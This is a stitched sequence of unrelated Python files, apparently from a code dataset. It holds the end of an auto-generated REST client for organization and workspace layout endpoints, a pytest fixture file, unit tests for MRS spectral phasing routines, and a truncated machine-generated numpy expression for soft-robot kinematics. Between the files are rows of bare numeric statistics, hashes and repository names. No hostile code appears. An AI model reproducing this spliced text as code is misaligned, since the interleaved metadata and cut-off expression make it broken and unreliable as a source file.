Sets complete layout of organization, like workspaces, user-groups, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_organization_layout(declarative_organization, async_req=True)
>>> result = thread.get()
Args:
declarative_organization (DeclarativeOrganization):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_organization'] = \
declarative_organization
return self.call_with_http_info(**kwargs)
self.set_organization_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/organization',
'operation_id': 'set_organization_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_organization',
],
'required': [
'declarative_organization',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_organization':
(DeclarativeOrganization,),
},
'attribute_map': {
},
'location_map': {
'declarative_organization': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__set_organization_layout
)
def __set_workspace_data_filters_layout(
self,
declarative_workspace_data_filters,
**kwargs
):
"""Set all workspace data filters # noqa: E501
Sets workspace data filters in all workspaces in entire organization. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_workspace_data_filters_layout(declarative_workspace_data_filters, async_req=True)
>>> result = thread.get()
Args:
declarative_workspace_data_filters (DeclarativeWorkspaceDataFilters):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_workspace_data_filters'] = \
declarative_workspace_data_filters
return self.call_with_http_info(**kwargs)
self.set_workspace_data_filters_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/workspaceDataFilters',
'operation_id': 'set_workspace_data_filters_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_workspace_data_filters',
],
'required': [
'declarative_workspace_data_filters',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_workspace_data_filters':
(DeclarativeWorkspaceDataFilters,),
},
'attribute_map': {
},
'location_map': {
'declarative_workspace_data_filters': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__set_workspace_data_filters_layout
)
def __set_workspaces_layout(
self,
declarative_workspaces,
**kwargs
):
"""Set all workspaces layout # noqa: E501
Sets complete layout of workspaces, their hierarchy, models. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_workspaces_layout(declarative_workspaces, async_req=True)
>>> result = thread.get()
Args:
declarative_workspaces (DeclarativeWorkspaces):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['declarative_workspaces'] = \
declarative_workspaces
return self.call_with_http_info(**kwargs)
self.set_workspaces_layout = _Endpoint(
settings={
'response_type': None,
'auth': [],
'endpoint_path': '/api/layout/workspaces',
'operation_id': 'set_workspaces_layout',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'declarative_workspaces',
],
'required': [
'declarative_workspaces',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'declarative_workspaces':
(DeclarativeWorkspaces,),
},
'attribute_map': {
},
'location_map': {
'declarative_workspaces': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__set_workspaces_layout
)
| 37.584158
| 124
| 0.479303
| 7,446
| 87,308
| 5.342197
| 0.030218
| 0.033938
| 0.026145
| 0.027151
| 0.895294
| 0.862638
| 0.842023
| 0.830233
| 0.81085
| 0.799236
| 0
| 0.003249
| 0.443052
| 87,308
| 2,322
| 125
| 37.600345
| 0.81479
| 0.344218
| 0
| 0.638705
| 1
| 0
| 0.228367
| 0.064469
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013871
| false
| 0
| 0.009247
| 0
| 0.036988
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1b6b8e9fcffb5d1c25fe87536af1a30787e90d54
| 177
|
py
|
Python
|
tests/message_processing/conftest.py
|
aleph-im/py-aleph
|
a18beb8b4eba36887ca85054ed2471c3680bdfde
|
[
"MIT"
] | null | null | null |
tests/message_processing/conftest.py
|
aleph-im/py-aleph
|
a18beb8b4eba36887ca85054ed2471c3680bdfde
|
[
"MIT"
] | null | null | null |
tests/message_processing/conftest.py
|
aleph-im/py-aleph
|
a18beb8b4eba36887ca85054ed2471c3680bdfde
|
[
"MIT"
] | null | null | null |
import pytest
from .load_fixtures import load_fixture_messages
@pytest.fixture
def fixture_messages():
return load_fixture_messages("test-data-pending-tx-messages.json")
| 19.666667
| 70
| 0.813559
| 24
| 177
| 5.75
| 0.583333
| 0.326087
| 0.275362
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 177
| 8
| 71
| 22.125
| 0.867925
| 0
| 0
| 0
| 0
| 0
| 0.19209
| 0.19209
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| true
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
59f4c94b24c76c626e35f7304097ac83e1ab4752
| 2,194
|
py
|
Python
|
tests/test_mrs/test_processing/test_phasing.py
|
hjiang1/suspect
|
f8b320b16bbd73a95d58eea1660921d6cad16f36
|
[
"MIT"
] | 16
|
2016-08-31T21:05:06.000Z
|
2022-02-06T12:48:33.000Z
|
tests/test_mrs/test_processing/test_phasing.py
|
hjiang1/suspect
|
f8b320b16bbd73a95d58eea1660921d6cad16f36
|
[
"MIT"
] | 141
|
2016-07-28T21:34:17.000Z
|
2022-03-30T09:00:36.000Z
|
tests/test_mrs/test_processing/test_phasing.py
|
hjiang1/suspect
|
f8b320b16bbd73a95d58eea1660921d6cad16f36
|
[
"MIT"
] | 21
|
2016-08-04T14:54:19.000Z
|
2022-03-29T16:04:08.000Z
|
import suspect
import numpy as np
def test_mag_real_zero():
time_axis = np.arange(0, 1.024, 2.5e-4)
sample_data = (6 * suspect.basis.gaussian(time_axis, 0, 0.0, 12)
+ suspect.basis.gaussian(time_axis, 250, 0.0, 12)
+ suspect.basis.gaussian(time_axis, 700, 0.0, 12))
sample_data = sample_data.adjust_phase(0.2, 0)
sample_data += np.random.rand(len(sample_data)) * 1e-6
phi0, phi1 = suspect.processing.phase.mag_real(sample_data)
np.testing.assert_allclose(phi0, -0.2, rtol=0.4)
def test_acme_zero():
time_axis = np.arange(0, 1.024, 2.5e-4)
sample_data = (6 * suspect.basis.gaussian(time_axis, 0, 0.0, 12)
+ suspect.basis.gaussian(time_axis, 50, 0.0, 12)
+ suspect.basis.gaussian(time_axis, 200, 0.0, 12))
sample_data = sample_data.adjust_phase(0.2, 0)
sample_data += np.random.rand(len(sample_data)) * 1e-6
phi0, phi1 = suspect.processing.phase.acme(sample_data)
np.testing.assert_allclose(phi0, -0.2, rtol=0.05)
def test_acme_first():
time_axis = np.arange(0, 1.024, 2.5e-4)
sample_data = (6 * suspect.basis.gaussian(time_axis, 0, 0.0, 6)
+ suspect.basis.gaussian(time_axis, 150, 0.0, 6))
sample_data += np.random.rand(len(sample_data)) * 2e-6
in_0 = 0.5
in_1 = 0.001
sample_data = sample_data.adjust_phase(in_0, in_1)
out_0, out_1 = suspect.processing.phase.acme(sample_data)
np.testing.assert_allclose(in_0, -out_0, rtol=0.5)
np.testing.assert_allclose(in_1, -out_1, rtol=0.5)
def test_acme_range_hz():
time_axis = np.arange(0, 1.024, 2.5e-4)
sample_data = (6 * suspect.basis.gaussian(time_axis, 0, 0.0, 12)
+ suspect.basis.gaussian(time_axis, 50, 0.0, 12)
- suspect.basis.gaussian(time_axis, 200, 0.0, 12))
sample_data += np.random.rand(len(sample_data)) * 1e-7
in_0 = 0.2
in_1 = 0.001
sample_data = sample_data.adjust_phase(in_0, in_1)
out_0, out_1 = suspect.processing.phase.acme(sample_data, range_hz=(-1000, 75))
np.testing.assert_allclose(in_0, -out_0, rtol=0.05)
np.testing.assert_allclose(in_1, -out_1, rtol=0.2)
| 35.387097
| 83
| 0.646764
| 374
| 2,194
| 3.57754
| 0.149733
| 0.179372
| 0.164425
| 0.197309
| 0.894619
| 0.894619
| 0.872945
| 0.872945
| 0.82287
| 0.802691
| 0
| 0.101841
| 0.20784
| 2,194
| 61
| 84
| 35.967213
| 0.668009
| 0
| 0
| 0.395349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139535
| 1
| 0.093023
| false
| 0
| 0.046512
| 0
| 0.139535
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
941028b720d64cb83ee2031ab1e3cd5946102040
| 60,029
|
py
|
Python
|
o/soft_robot/rmp/Phi_2.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
o/soft_robot/rmp/Phi_2.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
o/soft_robot/rmp/Phi_2.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
import numpy
def f(q, xi):
return numpy.array([
[((-4810558749.47727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 26.6666666666667*numpy.sqrt(3)*(q[4, 0] - q[5, 0]))*(12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])) + (-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1)*(-2405279374.73864*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 898984.910836762*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 6320.98765432099*(4*q[3, 0] - 2*q[4, 0] - 2*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 30441817.0865359*(8*q[3, 0] - 4*q[4, 0] - 4*q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 53.3333333333333*q[3, 0] + 26.6666666666667*q[4, 0] + 26.6666666666667*q[5, 0]) + (-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0])*(-51312626661.0909*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**5 + 1623563577.94858*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 31963907.9408627*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 337119.341563786*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1422.22222222222*q[3, 0]**2 + 1422.22222222222*q[3, 0]*q[4, 0] + 1422.22222222222*q[3, 0]*q[5, 0] - 1422.22222222222*q[4, 0]**2 + 1422.22222222222*q[4, 0]*q[5, 0] - 1422.22222222222*q[5, 0]**2 + 1))*(60131984.3684659*xi**9*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 - 1522090.85432679*xi**7*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 + 22474.6227709191*xi**5*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 - 79.0123456790123*xi**3*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(2*q[6, 0]**2 - 2*q[6, 0]*q[7, 0] - 2*q[6, 0]*q[8, 0] + 2*q[7, 0]**2 - 2*q[7, 0]*q[8, 0] + 2*q[8, 0]**2) + (1/3)*xi*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + ((4810558749.47727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 121767268.346143*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 1797969.82167352*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 12641.975308642*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 26.6666666666667*numpy.sqrt(3)*(q[4, 0] - q[5, 0]))*(-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0]) + (12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]))*(-38484469995.8182*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 1217672683.46143*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 23972930.955647*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 252839.506172839*(q[4, 0] - q[5, 0])**2*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1066.66666666667*(q[4, 0] - q[5, 0])**2 + 1) + (12828156665.2727*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 355.555555555555*numpy.sqrt(3)*(q[4, 0] - q[5, 0])*(2*q[3, 0] - q[4, 0] - q[5, 0]))*(-12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 + 1))*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[6, 0] - q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)*(q[6, 0]**2 - q[6, 0]*q[7, 0] - q[6, 0]*q[8, 0] + q[7, 0]**2 - q[7, 0]*q[8, 0] + q[8, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[7, 0] - q[8, 0])*(q[6, 0] + q[7, 0] + q[8, 0] + 0.45)) + ((12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 